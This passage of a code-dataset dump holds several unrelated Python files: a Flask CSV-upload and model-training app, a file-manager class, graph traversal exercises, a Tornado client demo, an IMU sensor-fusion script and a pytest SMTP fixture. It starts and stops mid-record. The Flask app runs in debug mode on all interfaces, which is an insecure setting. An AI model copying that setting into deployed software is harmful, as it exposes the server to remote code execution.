form():\r\n    return render_template('hello.html')\r\n\r\n@app.route('/',methods=['POST'])\r\ndef form_post():\r\n    text = request.form['text']\r\n    tt = text.upper()\r\n    if (tt=='YES'):\r\n        return redirect(url_for('upload_file')) \r\n    elif (tt=='NO'):\r\n        return redirect(url_for('upload_file1')) \r\n\r\n@app.route('/upload')\r\ndef upload_file():\r\n    return render_template('upload.html')\r\n@app.route('/test')\r\ndef upload_file1():\r\n    return render_template('upload1.html')\r\n\r\n@app.route('/uploader', methods = ['GET', 'POST'])\r\ndef upload_file2():\r\n    if request.method == 'POST':\r\n        f = request.files['file']\r\n        print(f.filename)\r\n        f.filename = 'train.csv'\r\n        f.save(secure_filename(f.filename))\r\n        train()\r\n        \r\n    return render_template('hello.html')\r\n\r\n@app.route('/uploader1', methods = ['GET', 'POST'])\r\ndef upload_file3():\r\n    if request.method == 'POST':\r\n        f = request.files['file']\r\n        f.filename = 'test.csv'\r\n        f.save(secure_filename(f.filename))\r\n        #train()\r\n        mod = loadpickle('model.pkl')\r\n        test(mod)\r\n        #return (\"file uploaded successfully\")\r\n    return render_template('hello.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n    handler = logging.handlers.RotatingFileHandler('logs/server.log',maxBytes=1024 * 1024)\r\n    #handler.setFormatter(formatter)\r\n    logging.getLogger('werkzeug').setLevel(logging.DEBUG)\r\n    logging.getLogger('werkzeug').addHandler(handler)\r\n    app.logger.setLevel(logging.WARNING)\r\n    app.logger.addHandler(handler)\r\n    app.run(host='0.0.0.0', debug=True)","sub_path":"Hello.py","file_name":"Hello.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"579106407","text":"from visbeat.AObject import *\n#import shutil\nfrom distutils.dir_util import copy_tree\n\n\nclass AFileManager(AObject):\n    \"\"\"AFileManager (class): Manages assets.
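 Directories are registered by name, created on demand, and their paths are persisted to a JSON sidecar file (sentence added for context).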
This should really be replaced with a database of some sort...\n    Attributes:\n        todo\n    \"\"\"\n\n    @staticmethod\n    def AOBJECT_TYPE():\n        return 'AFileManager'\n\n    def getJSONPath(self):\n        return self.getPath()\n\n    def __init__(self, path=None, clear_temp=None):\n        \"\"\"If you provide a directory, it will look for an existing AFileManager.json in that directory, or create one if it does not already exist.\n        If you provide a json, it will use that json, unless the json doesn't exist, in which case it will complain...\n        \"\"\"\n        AObject.__init__(self, path=path)\n        # self.initializeBlank()\n        self.initWithPath(path=path, clear_temp=clear_temp)\n\n    def initializeBlank(self):\n        AObject.initializeBlank(self)\n        self.directories = {}\n\n    def getJSONName(self):\n        return self.AOBJECT_TYPE()+\".json\"\n\n    def initWithPath(self, path=None, clear_temp=None):\n        oldpath = None\n        newpath = path\n        if(path):\n            if(os.path.isfile(path)):\n                self.loadFromJSON(self.getJSONPath()) #assume path property is already set to 'path'\n                oldpath = self.getPath() #whatever was in the json, having overwritten path property\n            elif(os.path.isdir(path)):\n                json_file_path = path+os.sep+self.getJSONName()\n                self.setPath(json_file_path)\n                if(os.path.isfile(self.getJSONPath())):\n                    self.loadFromJSON(json_file_path)\n                    oldpath = self.getPath()\n                    newpath = json_file_path\n                    # self.setPath(file_path=json_file_path)\n                else:\n                    newpath = self.getJSONPath()\n                    self.writeToJSON(json_path=newpath) #no json file found, so we create one\n            else:\n                assert False, \"Given AFileManager path is neither an existing directory nor a file! path: {} (AFileManager.py)\".format(path)\n\n        self.setPath(file_path=newpath)\n\n        if(oldpath):\n            oldir = get_dir_from_path(pathstring(oldpath))\n            newdir = get_dir_from_path(pathstring(newpath))\n            if(oldir != newdir):\n                AWARN(\"FILEMANAGER FOUND FILE MOVED FROM:\\n{}\\nTO:\\n{}\\nUPDATING DIRECTORIES...\".format(oldir,\n                                                                                                        newdir))\n                for d in self.directories:\n                    dpth = self.directories[d]\n                    if(dpth.startswith(oldir)):\n                        dpthst = dpth[len(oldir):]  # slice off the prefix; str.lstrip strips a character set, not a prefix\n                        self.directories[d] = os.path.join(newdir,dpthst)\n                        AWARN(\"{} updated to {}\".format(dpth, self.directories[d]))\n\n\n        self.setDir('data', pathstring(self.getDirectoryPath()+os.sep+\"Data\"+os.sep))\n        self.setDir('backup', pathstring(self.getDir('data')+\"Backups\"+os.sep))\n        self.setDir('temp', pathstring(self.getDir('data')+\"TEMP\"+os.sep))\n        temp_dir = self.getDir('temp')\n        if(os.path.isdir(temp_dir) and (clear_temp)):\n            for the_file in os.listdir(temp_dir):\n                file_path = os.path.join(temp_dir, the_file)\n                try:\n                    if os.path.isfile(file_path):\n                        os.remove(file_path)\n                        #os.unlink(file_path)\n                    #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n                except Exception as e:\n                    print(e)\n        make_sure_path_exists(temp_dir)\n        #Video.VIDEO_TEMP_DIR = temp_dir\n\n    def setDir(self, name, path):\n        # AWARN(\"setting {} to {}\".format(name, path))\n        # assert(name is not 'log')\n        self.directories[name] = path\n        make_sure_path_exists(path)\n        return path\n\n    def addDir(self, name):\n        assert(name not in self.directories), \"tried to add {} dir to AFileManager, but this dir is already set\"\n        return self.setDir(name, pathstring(self.getDirectoryPath()+os.sep+name+os.sep))\n\n    def getDir(self, name):\n        # printDictionary(self.directories)\n        return self.directories.get(name)\n\n\n    def emptyDir(self, name):\n        dpth = self.getDir(name)\n        if(dpth is not None and os.path.isdir(dpth)):\n            shutil.rmtree(dpth)\n            make_sure_path_exists(dpth)\n\n    def deleteDir(self, name):\n        dpth = self.getDir(name)\n        if (dpth is not None 
and os.path.isdir(dpth)):\n shutil.rmtree(dpth)\n d = dict(self.directories)\n del d[name]\n self.directories=d\n\n\n def toDictionary(self):\n d = AObject.toDictionary(self)\n d['directories']=self.directories\n #serialize class specific members\n return d\n\n def copyPathToDir(self, path_to_copy, dest_dir):\n dest_path = self.getDir(dest_dir)\n if(dest_path):\n if(os.path.isdir(path_to_copy)):\n copy_tree(src=path_to_copy, dst=dest_path)\n elif(os.path.isfile(path_to_copy)):\n shutil.copy2(path_to_copy, dest_path)\n return\n\n def copyDirToPath(self, dir_to_copy, dest_path):\n src_path = self.getDir(dir_to_copy)\n if(src_path):\n if(os.path.isdir(dest_path)):\n copy_tree(src=src_path, dst=dest_path)\n return\n\n @staticmethod\n def copyRandomFractionOfFilesInSourceDir(source_dir, dest_dir, fraction=1.0, ext=None):\n \"\"\"\n Copies a random fraction of files in source directory... Wrote this for splitting training/test data in ML applications.\n :param source_dir:\n :param dest_dir:\n :param fraction:\n :param ext:\n :return:\n \"\"\"\n directories = []\n subdirnames = []\n filepaths = []\n for filename in os.listdir(source_dir):\n path = os.path.join(source_dir, filename)\n if os.path.isdir(path):\n directories.append(path)\n subdirnames.append(filename)\n else:\n # namepart, extpart = os.path.splitext(filename)\n if((ext is None) or filename.lower().endswith(ext)):\n filepaths.append(path)\n\n n_to_copy = int(len(filepaths)*fraction)\n random_seed = 0\n random.seed(random_seed)\n random.shuffle(filepaths)\n copy_sources = filepaths[:n_to_copy]\n for src, dst in zip(copy_sources, [dest_dir]*len(copy_sources)):\n #print(\"src: {}\\ndst: {}\".format(src, dst))\n shutil.copy2(src, dst)\n\n for d in range(len(directories)):\n subdest = pathstring(os.path.join(dest_dir,subdirnames[d])+os.sep)\n make_sure_dir_exists(subdest)\n AFileManager.copyRandomFractionOfFilesInSourceDir(source_dir=directories[d], dest_dir=subdest, fraction=fraction, ext=ext)\n\n def initFromDictionary(self, d):\n AObject.initFromDictionary(self, d)\n self.directories = d['directories']\n\n def save(self):\n if(os.path.isfile(self.getJSONPath())):\n os.rename(self.getJSONPath(), self.getDir('backup')+os.sep+self.AOBJECT_TYPE()+\".json\")\n self.writeToJSON(self.getJSONPath())\n","sub_path":"visbeat/AFileManager.py","file_name":"AFileManager.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354484376","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nApril 2018\nS3#\n\"\"\"\n\nfrom algopy import graph, graphmat, queue\n\ndef degrees(G):\n Din = [0] * G.order\n Dout = [0] * G.order\n for s in range(G.order):\n Dout[s] = len(G.adjlists[s])\n for adj in G.adjlists[s]:\n Din[adj] += 1\n \n return (Din, Dout)\n\ndef degreesMat(G):\n (din, dout) = (0, 0)\n for s in range(G.order):\n din_s, dout_s = 0, 0\n for adj in range(G.order):\n dout_s += G.adj[s][adj]\n din_s += G.adj[adj][s]\n din = max(din, din_s)\n dout = max(dout, dout_s)\n \n return (din, dout)\n\n\n\ndef __BFS(G, s, p):\n q = queue.Queue()\n q.enqueue(s)\n p[s] = -1\n while not q.isempty():\n s = q.dequeue()\n print(s)\n for adj in G.adjlists[s]:\n if p[adj] == None:\n q.enqueue(adj)\n p[adj] = s\n\ndef BFS(G):\n p = [None] * G.order\n for s in range(G.order):\n if p[s] is None:\n __BFS(G, s, p)\n return p\n\n\ndef __DFS(G, s, M):\n M[s] = True\n for adj in G.adjlists[s]:\n if not M[adj]:\n __DFS(G, adj, M)\n\ndef DFS(G):\n M = [False] * G.order\n for s 
in range(G.order):\n        if not M[s]:\n            __DFS(G, s, M)\n\n","sub_path":"S3/graphs_basics.py","file_name":"graphs_basics.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"75910088","text":"\r\n\r\n# http://www.tuicool.com/articles/RjIJF3\r\n\r\nimport tornado.ioloop\r\nfrom tornado.httpclient import AsyncHTTPClient\r\n\r\n# Usage is simple: handle_request here is the callback.\r\n# That is, once the fetch hits blocking I/O it is deferred; when it completes\r\n# on its own, the handle_request function is invoked directly.\r\n\r\ndef handle_request(response):\r\n\t'''callback needed when a response arrives'''\r\n\tif response.error:\r\n\t\tprint (\"Error:\", response.error)\r\n\telse:\r\n\t\tprint ('called')\r\n\t\tprint (response.body)\r\nhttp_client = AsyncHTTPClient() # we initialize our http client instance\r\nhttp_client.fetch(\"http://www.baidu.com\", handle_request) # here we try\r\n\t\t\t\t\t# to fetch a URL and delegate its response to the callback\r\ntornado.ioloop.IOLoop.instance().start() # start the tornado ioloop to\r\n\t\t\t\t\t# listen for events","sub_path":"a-start/008_tornado/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"122140273","text":"####################################################################################\n#\n# Program dependencies: the IMU circuit must be placed either facing up\n# or facing down for an accurate initialization process. Depending on up/down,\n# several lines of code need to be commented out or used. These sections\n# of code are titled:\n# ##########Direction Requirement###########\n# For the purposes of this project, which used the Adafruit 10-DOF, the unit\n# is considered upside down if the IC's on the IMU are facing the direction\n# of the earth. 
Right side up is IC's facing the sky.\n#\n####################################################################################\n\n\nimport sys\nimport smbus\nimport time\nimport math\nfrom LSM303_U import *\nfrom L3GD20_GYRO import *\nimport datetime\nbus = smbus.SMBus(1)\n\nRAD_TO_DEG = 57.29578\nM_PI = 3.14159265358979323846\nG_GAIN = 0.070 # [deg/s/LSB] If you change the dps for gyro, you need to update this value accordingly\nAA = 0.40 # Complementary filter constant\n\n#Kalman filter variables\nQ_angle = 0.02\nQ_gyro = 0.0015\nR_angle = 0.005\nx_bias = y_bias = 0.0\nXP_00 = XP_01 = XP_10 = XP_11 = 0.0\nYP_00 = YP_01 = YP_10 = YP_11 = 0.0\nKFangleX = KFangleY = 0.0\n\ndef kalmanFilterY ( accAngle, gyroRate, DT):\n\ty=0.0\n\tS=0.0\n\n\tglobal KFangleY\n\tglobal Q_angle\n\tglobal Q_gyro\n\tglobal y_bias\n\tglobal YP_00\n\tglobal YP_01\n\tglobal YP_10\n\tglobal YP_11\n\n\tKFangleY = KFangleY + DT * (gyroRate - y_bias)\n\n\tYP_00 = YP_00 + ( - DT * (YP_10 + YP_01) + Q_angle * DT )\n\tYP_01 = YP_01 + ( - DT * YP_11 )\n\tYP_10 = YP_10 + ( - DT * YP_11 )\n\tYP_11 = YP_11 + ( + Q_gyro * DT )\n\n\ty = accAngle - KFangleY\n\tS = YP_00 + R_angle\n\tK_0 = YP_00 / S\n\tK_1 = YP_10 / S\n\t\n\tKFangleY = KFangleY + ( K_0 * y )\n\ty_bias = y_bias + ( K_1 * y )\n\t\n\tYP_00 = YP_00 - ( K_0 * YP_00 )\n\tYP_01 = YP_01 - ( K_0 * YP_01 )\n\tYP_10 = YP_10 - ( K_1 * YP_00 )\n\tYP_11 = YP_11 - ( K_1 * YP_01 )\n\t\n\treturn KFangleY\n\ndef kalmanFilterX ( accAngle, gyroRate, DT):\n\tx=0.0\n\tS=0.0\n\n\tglobal KFangleX\n\tglobal Q_angle\n\tglobal Q_gyro\n\tglobal x_bias\n\tglobal XP_00\n\tglobal XP_01\n\tglobal XP_10\n\tglobal XP_11\n\n\n\tKFangleX = KFangleX + DT * (gyroRate - x_bias)\n\n\tXP_00 = XP_00 + ( - DT * (XP_10 + XP_01) + Q_angle * DT )\n\tXP_01 = XP_01 + ( - DT * XP_11 )\n\tXP_10 = XP_10 + ( - DT * XP_11 )\n\tXP_11 = XP_11 + ( + Q_gyro * DT )\n\n\tx = accAngle - KFangleX\n\tS = XP_00 + R_angle\n\tK_0 = XP_00 / S\n\tK_1 = XP_10 / S\n\t\n\tKFangleX = KFangleX + ( K_0 * x )\n\tx_bias = x_bias + ( K_1 * x )\n\t\n\tXP_00 = XP_00 - ( K_0 * XP_00 )\n\tXP_01 = XP_01 - ( K_0 * XP_01 )\n\tXP_10 = XP_10 - ( K_1 * XP_00 )\n\tXP_11 = XP_11 - ( K_1 * XP_01 )\n\t\n\treturn KFangleX\n\n'''\ndef writeRegisterAxis(Address, register, value):\n\tbus.write_byte_data(Address, register, value)\n\treturn -1\n'''\n\ndef writeACC(register,value):\n bus.write_byte_data(LSM303_ADDRESS_ACCEL , register, value)\n return -1\n\ndef writeMAG(register,value):\n bus.write_byte_data(LSM303_ADDRESS_MAG, register, value)\n return -1\n\ndef writeGRY(register,value):\n bus.write_byte_data(L3GD20_ADDRESS_GYRO, register, value)\n return -1\n\n'''\ndef readACCAxis(axis):\n reg = LSM303_ACCEL_OUT_X_L_A\n if axis == 'x':\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg) \n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 1) \n elif axis == 'y':\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 2)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 3)\n else: #axis == 'z': #implied since only 3 possible values\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 4)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 5)\n \n\tacc_combined = (acc_l | acc_h <<8)\n\treturn acc_combined if acc_combined < 32768 else acc_combined - 65536\n\ndef readMAGAxis(axis):\n reg = LSM303_MAG_OUT_X_H_M\n if axis == 'x':\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, reg) \n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 1) \n elif axis == 'z':\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 2)\n mag_l = 
bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 3)\n else: #axis == 'y' #implied since only 3 possible values\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 4)\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 5)\n \n\tmag_combined = (mag_l | mag_h <<8)\n\treturn mag_combined if mag_combined < 32768 else mag_combined - 65536\n\ndef readGYRAxis(axis):\n reg = L3GD20_OUT_X_L\n if axis == 'x':\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 1)\n elif axis == 'y':\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 2)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 3)\n else: #axis == 'z'\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 4)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 5)\n\n gyr_combined = (gyr_l | gyr_h <<8)\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n'''\n\ndef readACCx():\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_X_L_A)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_X_H_A)\n acc_combined = (acc_l | acc_h <<8)\n\n return acc_combined if acc_combined < 32768 else acc_combined - 65536\n\n\ndef readACCy():\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Y_L_A)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Y_H_A)\n acc_combined = (acc_l | acc_h <<8)\n\n return acc_combined if acc_combined < 32768 else acc_combined - 65536\n\n\ndef readACCz():\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Z_L_A)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Z_H_A)\n acc_combined = (acc_l | acc_h <<8)\n\n return acc_combined if acc_combined < 32768 else acc_combined - 65536\n\n\ndef readMAGx():\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_X_L_M)\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_X_H_M)\n mag_combined = (mag_l | mag_h <<8)\n\n return mag_combined if mag_combined < 32768 else mag_combined - 65536\n\n\ndef readMAGy():\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Y_L_M)\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Y_H_M)\n mag_combined = (mag_l | mag_h <<8)\n\n return mag_combined if mag_combined < 32768 else mag_combined - 65536\n\n\ndef readMAGz():\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Z_L_M)\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Z_H_M)\n mag_combined = (mag_l | mag_h <<8)\n\n return mag_combined if mag_combined < 32768 else mag_combined - 65536\n\n\n\ndef readGYRx():\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_X_L)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_X_H)\n gyr_combined = (gyr_l | gyr_h <<8)\n\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n \n\ndef readGYRy():\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Y_L)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Y_H)\n gyr_combined = (gyr_l | gyr_h <<8)\n\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n\ndef readGYRz():\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Z_L)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Z_H)\n gyr_combined = (gyr_l | gyr_h <<8)\n\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n\n'''\n#initialise the accelerometer\nwriteRegisterAxis(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_CTRL_REG1_A, 0b01100111) #z,y,x axis enabled, continuos update, 100Hz data 
rate\nwriteRegisterAxis(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_CTRL_REG2_A, 0b00100000) #+/- 16G full scale\n\n#initialise the magnetometer\nwriteRegisterAxis(LSM303_ADDRESS_MAG, LSM303_CRA_REG_M, 0b11110000) #Temp enable, M data rate = 50Hz\nwriteRegisterAxis(LSM303_ADDRESS_MAG, LSM303_CRB_REG_M, 0b01100000) #+/-12gauss\nwriteRegisterAxis(LSM303_ADDRESS_MAG, LSM303_MR_REG_M, 0b00000000) #Continuous-conversion mode\n\n#initialise the gyroscope\nwriteRegisterAxis(L3GD20_ADDRESS_GYRO, L3GD20_CTRL_REG1, 0b00001111) #Normal power mode, all axes enabled\nwriteRegisterAxis(L3GD20_ADDRESS_GYRO, L3GD20_CTRL_REG4, 0b00110000) #Continuos update, 2000 dps full scale\n'''\n\n#initialise the accelerometer\nwriteACC(LSM303_ACCEL_CTRL_REG1_A, 0b01100111) #z,y,x axis enabled, continuos update, 100Hz data rate\nwriteACC(LSM303_ACCEL_CTRL_REG2_A, 0b00100000) #+/- 16G full scale\n\n#initialise the magnetometer\nwriteMAG(LSM303_CRA_REG_M, 0b11110000) #Temp enable, M data rate = 50Hz\nwriteMAG(LSM303_CRB_REG_M, 0b01100000) #+/-12gauss\nwriteMAG(LSM303_MR_REG_M, 0b00000000) #Continuous-conversion mode\n\n#initialise the gyroscope\nwriteGRY(L3GD20_CTRL_REG1, 0b00001111) #Normal power mode, all axes enabled\nwriteGRY(L3GD20_CTRL_REG4, 0b00110000) #Continuos update, 2000 dps full scale\n\n\ngyroXangle = gyroYangle = gyroZangle = 0.0\nCFangleX = CFangleY = 0.0\nkalmanX = kalmanY = 0.0\n\na = datetime.datetime.now() #Gyro Timing Control\n\n#n = 0\n\n#while True: #Continous run Disabled to allow Node.js control\n\n#for num in range(1,20):\t #Currently this loop runs for 20 reads providing greater accuracy\n\t\n\t#Read the accelerometer,gyroscope and magnetometer values\n'''\nACCx = readACCAxis('x')\nACCy = readACCAxis('y')\nACCz = readACCAxis('z')\nGYRx = readGYRAxis('x')\nGYRy = readGYRAxis('y')\nGYRz = readGYRAxis('z')\nMAGx = readMAGAxis('x')\nMAGy = readMAGAxis('y')\nMAGz = readMAGAxis('z')\n'''\nACCx = readACCx()\nACCy = readACCy()\nACCz = readACCz()\nGYRx = readGYRx()\nGYRy = readGYRy()\nGYRz = readGYRz()\nMAGx = readMAGx()\nMAGy = readMAGy()\nMAGz = readMAGz()\n\n##Calculate loop Period(LP). How long between Gyro Reads\nb = datetime.datetime.now() - a\na = datetime.datetime.now()\nLP = b.microseconds/(1000000*1.0)\n#print \"Loop Time | %5.2f|\" % ( LP ), #Error checking stop\n\n#Convert Gyro raw to degrees per second\nrate_gyr_x = GYRx * G_GAIN\nrate_gyr_y = GYRy * G_GAIN\nrate_gyr_z = GYRz * G_GAIN\n\n#Calculate the angles from the gyro. 
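Integrating the rate (deg/s) over the loop period LP accumulates an angle in degrees; gyro drift makes this estimate wander over time, which the complementary and Kalman filters below correct (note added).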
\ngyroXangle+=rate_gyr_x*LP\ngyroYangle+=rate_gyr_y*LP\ngyroZangle+=rate_gyr_z*LP\n\n\n##Convert Accelerometer values to degrees\nAccXangle = (math.atan2(ACCy,ACCz)+M_PI)*RAD_TO_DEG\nAccYangle = (math.atan2(ACCz,ACCx)+M_PI)*RAD_TO_DEG\n\n####################################################################\t\n##########Direction Requirement####Correct rotation value###########\n####################################################################\n#Change the rotation value of the accelerometer to -/+ 180 and\n#move the Y axis '0' point to up.\n#\n#Two different pieces of code are used depending on how your IMU is mounted.\n#If IMU is up the correct way, IC's facing the sky, Use these lines\nAccXangle -= 180.0\nif AccYangle > 90:\n\tAccYangle -= 270.0\nelse:\n\tAccYangle += 90.0\n#\n#\n#If IMU is upside down, IC's facing the Earth, using these lines\n#if AccXangle >180:\n# AccXangle -= 360.0\n#AccYangle-=90\n#if (AccYangle >180):\n# AccYangle -= 360.0\n############################ END ##################################\n\n\n#Complementary filter used to combine the accelerometer and gyro values.\nCFangleX=AA*(CFangleX+rate_gyr_x*LP) +(1 - AA) * AccXangle\nCFangleY=AA*(CFangleY+rate_gyr_y*LP) +(1 - AA) * AccYangle\n\n#Kalman filter used to combine the accelerometer and gyro values.\nkalmanY = kalmanFilterY(AccYangle, rate_gyr_y,LP)\nkalmanX = kalmanFilterX(AccXangle, rate_gyr_x,LP)\n\n####################################################################\n##########Direction Requirement#######MAG direction ################\n####################################################################\n#If IMU is upside down, then use this line. It isnt needed if the\n# IMU is the correct way up\n#MAGy = -MAGy\n#\n############################ END ##################################\n\n\n#Calculate heading with Radian to Degree conversion\nheading = 180 * math.atan2(MAGy,MAGx)/M_PI\n\n#Only have our heading between 0 and 360\nif heading < 0:\n\theading += 360\n\n\n#Normalize accelerometer raw values.\naccXnorm = ACCx/math.sqrt(ACCx * ACCx + ACCy * ACCy + ACCz * ACCz)\naccYnorm = ACCy/math.sqrt(ACCx * ACCx + ACCy * ACCy + ACCz * ACCz)\n\n\n####################################################################\n##########Direction Requirement#####Calculate pitch and roll########\n####################################################################\n#Us these two lines when the IMU is right side up. IC's facing sky \npitch = math.asin(accXnorm)\nroll = -math.asin(accYnorm/math.cos(pitch))\n#\n#Us these four lines when the IMU is upside down. 
IC's facing earth\n#accXnorm = -accXnorm\t\t\t\t#flip Xnorm as the IMU is upside down\n#accYnorm = -accYnorm\t\t\t\t#flip Ynorm as the IMU is upside down\n#pitch = math.asin(accXnorm)\n#roll = math.asin(accYnorm/math.cos(pitch))\n#\n############################ END ##################################\n\n#Calculate the new tilt compensated values\nmagXcomp = MAGx*math.cos(pitch)+MAGz*math.sin(pitch)\nmagYcomp = MAGx*math.sin(roll)*math.sin(pitch)+MAGy*math.cos(roll)-MAGz*math.sin(roll)*math.cos(pitch)\n\n#Calculate tilt compensated heading w/ Radian to Degree conversion\ntiltCompensatedHeading = 180 * math.atan2(magYcomp,magXcomp)/M_PI\n\nif tiltCompensatedHeading < 0:\n\ttiltCompensatedHeading += 360\n\n\n#Error checking section for troubleshooting\n#if 0: #1:\t\t\t#Change to '1' to show the angles from the accelerometer\n# print (\"\\033[1;34;40mACCX Angle %5.2f ACCY Angle %5.2f \\033[0m \" % (AccXangle, AccYangle)),\n#\n#if 0: #1:\t\t\t#Change to '0' to stop showing the angles from the gyro\n# print (\"\\033[1;31;40m\\tGRYX Angle %5.2f GYRY Angle %5.2f GYRZ Angle %5.2f\" % (gyroXangle,gyroYangle,gyroZangle)),\n\n#if 0: #1:\t\t\t#Change to '0' to stop showing the angles from the complementary filter\n# print (\"\\033[1;35;40m \\tCFangleX Angle %5.2f \\033[1;36;40m CFangleY Angle %5.2f \\33[1;32;40m\" % (CFangleX,CFangleY)),\n\t\n#if 0: #1:\t\t\t#Change to '0' to stop showing the heading\n# print (\"HEADING %5.2f \\33[1;37;40m tiltCompensatedHeading %5.2f\" % (heading,tiltCompensatedHeading)),\n\t\n#if 0: #1:\t\t\t#Change to '0' to stop showing the angles from the Kalman filter\n# print (\"\\033[1;31;40m kalmanX %5.2f \\033[1;35;40m kalmanY %5.2f \" % (kalmanX,kalmanY))\n\n\n#slow program down a bit, makes the output more readable\n#time.sleep(0.5) #disable while not using loop features\n#break #this is disabling the while loop for Node.js control\n#n = n + 1\n#Output to stdout if running stand alone or passed to node.js control program through flush call\n#print(\"%d,%5.2f,%5.2f,%5.2f,%5.2f,%5.2f,%5.2f,%5.2f,%5.8f,%5.2f,%5.2f,%5.2f\" % (n, AccXangle, AccYangle, gyroXangle,gyroYangle,gyroZangle,CFangleX,CFangleY, heading, tiltCompensatedHeading, kalmanX,kalmanY))\n#print(\"%5.8f\" % (heading))\nsys.stdout.write(\"%5.8f\" % (heading))\n\n#sys.stdout.flush()\n#sys.exit(heading)\n","sub_path":"homebase/paddle/rotator/IMU_Acc_Mag_Gyro.py","file_name":"IMU_Acc_Mag_Gyro.py","file_ext":"py","file_size_in_byte":15373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"74558139","text":"# content of conftest.py\nimport pytest\nimport smtplib\n\n@pytest.fixture(scope=\"module\",\n                params=[\"smtp.163.com\",\"smtp.126.com\"]\n                )\ndef smtp(request):\n    # each parametrized invocation receives a single entry via request.param (singular)\n    smtp = smtplib.SMTP(request.param)\n    def fin():\n        print(\"teardown smtp\")\n        smtp.close()\n    request.addfinalizer(fin)\n    return smtp\n","sub_path":"demo/code/2015-12-14/pytest-fixture/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"247056723","text":"import numpy\nfrom math import exp\nfrom numpy import zeros  # numpy.numarray was removed from modern NumPy\nfrom urllib.request import urlopen\n\ndef llength(data):\n    x, _ = data[0]\n    return len(x)\n\ndef get_data():\n    result = []\n\n    file = urlopen(\"http://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/wdbc.data\")\n    for line in file.readlines():\n        array = line.decode(\"utf-8\").split(',')\n        result.append(([1.0] + [float(f) for f 
